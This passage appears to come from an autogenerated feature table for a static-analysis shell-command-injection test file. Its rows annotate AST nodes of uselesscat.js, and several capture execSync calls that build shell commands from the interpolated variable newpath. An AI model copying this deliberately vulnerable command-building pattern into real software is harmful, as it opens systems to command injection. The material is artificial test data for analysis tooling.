| err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:47:12:49 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:47:12:49 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:47:12:49 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:52:12:54 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:52:12:54 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:52:12:54 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:52:12:54 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:52:12:54 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:52:12:54 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:52:12:54 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:52:12:54 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:52:12:54 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:52:12:54 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:8 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:8 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:8 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:8 | console | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:8 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:12 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:12 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:12 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:12 | console.log | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:12 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | console.log(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | exceptional return of console.log(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:10:13:12 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:10:13:12 | log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:10:13:12 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:10:13:12 | log | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:10:13:12 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:14:13:16 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:14:13:16 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:14:13:16 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:14:13:16 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:14:13:16 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:14:13:16 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:14:13:16 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:14:13:16 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:29 | exceptional return of execSyn ... uinfo') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:29 | exceptional return of execSyn ... uinfo') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:29 | exceptional return of execSyn ... uinfo') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:29 | execSyn ... uinfo') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:29 | execSyn ... uinfo') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:29 | execSyn ... uinfo') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:38 | execSyn ... oString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:38 | execSyn ... oString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:38 | execSyn ... oString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:40 | exceptional return of execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:40 | exceptional return of execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:40 | exceptional return of execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:40 | execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:40 | execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:40 | execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:10:16:28 | 'cat /proc/cpuinfo' | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:10:16:28 | 'cat /proc/cpuinfo' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:10:16:28 | 'cat /proc/cpuinfo' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:10:16:28 | 'cat /proc/cpuinfo' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:10:16:28 | 'cat /proc/cpuinfo' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:10:16:28 | 'cat /proc/cpuinfo' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:31:16:38 | toString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:31:16:38 | toString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:31:16:38 | toString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:26 | exceptional return of execSyn ... path}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:26 | exceptional return of execSyn ... path}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:26 | exceptional return of execSyn ... path}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:26 | execSyn ... path}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:26 | execSyn ... path}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:26 | execSyn ... path}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:10:18:25 | `cat ${newpath}` | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:10:18:25 | `cat ${newpath}` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:10:18:25 | `cat ${newpath}` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:10:18:25 | `cat ${newpath}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:10:18:25 | `cat ${newpath}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:10:18:25 | `cat ${newpath}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:11:18:14 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:11:18:14 | cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:11:18:14 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:11:18:14 | cat | stringConcatenatedWith | -endpoint- newpath | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:17:18:23 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:17:18:23 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:17:18:23 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:17:18:23 | newpath | stringConcatenatedWith | 'cat ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:36 | exceptional return of execSyn ... wc -l') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:36 | exceptional return of execSyn ... wc -l') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:36 | exceptional return of execSyn ... wc -l') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:36 | execSyn ... wc -l') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:36 | execSyn ... wc -l') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:36 | execSyn ... wc -l') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:10:20:35 | 'cat pa ... wc -l' | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:10:20:35 | 'cat pa ... wc -l' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:10:20:35 | 'cat pa ... wc -l' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:10:20:35 | 'cat pa ... wc -l' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:10:20:35 | 'cat pa ... wc -l' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:10:20:35 | 'cat pa ... wc -l' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:38 | exceptional return of execSyn ... o/bar') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:38 | exceptional return of execSyn ... o/bar') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:38 | exceptional return of execSyn ... o/bar') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:38 | execSyn ... o/bar') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:38 | execSyn ... o/bar') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:38 | execSyn ... o/bar') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:47 | execSyn ... oString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:47 | execSyn ... oString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:47 | execSyn ... oString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:49 | exceptional return of execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:49 | exceptional return of execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:49 | exceptional return of execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:49 | execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:49 | execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:49 | execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:10:22:37 | 'cat /p ... oo/bar' | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:10:22:37 | 'cat /p ... oo/bar' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:10:22:37 | 'cat /p ... oo/bar' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:10:22:37 | 'cat /p ... oo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:10:22:37 | 'cat /p ... oo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:10:22:37 | 'cat /p ... oo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:40:22:47 | toString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:40:22:47 | toString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:40:22:47 | toString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:35 | exceptional return of execSyn ... o/bar`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:35 | exceptional return of execSyn ... o/bar`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:35 | exceptional return of execSyn ... o/bar`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:35 | execSyn ... o/bar`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:35 | execSyn ... o/bar`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:35 | execSyn ... o/bar`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:44 | execSyn ... oString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:44 | execSyn ... oString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:44 | execSyn ... oString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:46 | exceptional return of execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:46 | exceptional return of execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:46 | exceptional return of execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:46 | execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:46 | execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:46 | execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:10:24:34 | `cat ${ ... oo/bar` | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:10:24:34 | `cat ${ ... oo/bar` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:10:24:34 | `cat ${ ... oo/bar` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:10:24:34 | `cat ${ ... oo/bar` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:10:24:34 | `cat ${ ... oo/bar` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:10:24:34 | `cat ${ ... oo/bar` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:11:24:14 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:11:24:14 | cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:11:24:14 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:11:24:14 | cat | stringConcatenatedWith | -endpoint- newpath + ' /foo/bar' | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:17:24:23 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:17:24:23 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:17:24:23 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:17:24:23 | newpath | stringConcatenatedWith | 'cat ' -endpoint- ' /foo/bar' | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:25:24:33 | /foo/bar | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:25:24:33 | /foo/bar | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:25:24:33 | /foo/bar | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:25:24:33 | /foo/bar | stringConcatenatedWith | 'cat ' + newpath -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:37:24:44 | toString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:37:24:44 | toString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:37:24:44 | toString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:58 | exceptional return of exec(`c ... t) { }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:58 | exceptional return of exec(`c ... t) { }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:58 | exceptional return of exec(`c ... t) { }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:58 | exec(`c ... t) { }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:58 | exec(`c ... t) { }) | contextSurroundingFunctionParameters | | +| 